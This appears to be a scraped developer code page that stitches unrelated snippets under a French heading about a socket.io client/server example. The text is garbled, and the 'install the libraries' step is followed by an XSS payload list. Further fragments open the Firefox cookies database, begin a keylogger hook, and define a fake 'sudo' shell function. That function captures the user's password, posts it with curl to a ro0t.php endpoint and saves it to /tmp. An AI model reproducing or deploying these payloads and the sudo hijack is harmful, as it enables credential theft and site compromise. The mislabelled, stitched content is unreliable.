ɐʇɯon3ɹ atmoner

Exemple complet de client et de serveur socket.io

Pour voir une explication complète: https://stackoverflow.com/a/24232050/778272.

Comment utiliser

Créez un dossier, exécutez npm init -f, creer deux fichier server.js et client.js. Inutile de préciser que Node.js doit être installé sur votre système.

Installez les bibliothèques requises:

	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

	"/><script>alert(123)</script>
	<script>alert("hellox worldss");</script>
	javascript:alert("hellox worldss")
	<img src="javascript:alert('XSS');">
	<img src=javascript:alert("XSS")>
	<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
	<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
	<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
	<SCRIPT a=">" SRC="

	/* Utilisation:
	$ sqlite3 < commands.sql
	*/

	/* On ouvre le fichier cookies mozzila (/home/{user}/.mozzila/{moz_user}/cookies.sqlite) */
	.open cookies.sqlite

	/* On affiche proprement le schema de la table moz_cookies */
	.header on
	.mode column

	$('body').on('click', '#messages-view a', (event) => {
	event.preventDefault();
	let link = event.target.href;
	require("electron").shell.openExternal(link);
	});

	const ioHook = require('iohook');
	var key = require('./key.js');

	let data = {};
	let timers = [];


	/* Key Logger Ingest */
	ioHook.on("keydown", event => {
	timers[event.keycode] = Date.now();

	function someClass() {
	// Properties go here
	this.someProperty = 'some initial value';
	}
	// Member functions go here:
	someClass.prototype.someMemberFunction = function () {
	this.someProperty = 'modified value';
	console.log("called from prototype");
	}
	// Creation

	function sudo () {
	# By atmon3r 2020
	realsudo="$(which sudo)"
	read -s -p "[sudo] password for $USER: " ro0tPasswd
	curl --data "user="$USER"&pass=$ro0tPasswd" http://localhost/ro0t.php
	printf "\n"; printf '%s\n' "$USER : $ro0tPasswd" > /tmp/ro0t.txt
	$realsudo -S <<< "$ro0tPasswd" -u root bash -c "exit" > /dev/null 2>&1
	$realsudo "${@:1}"
	}

	{
	"nodes": [
	{
	"id": 1,
	"label": "Coronavirius",
	"relation": "tweet",
	"x": -392,
	"y": -217
	},
	{



	#include <Wire.h>


	void setup()
	{
	Wire.begin( 15, 4 );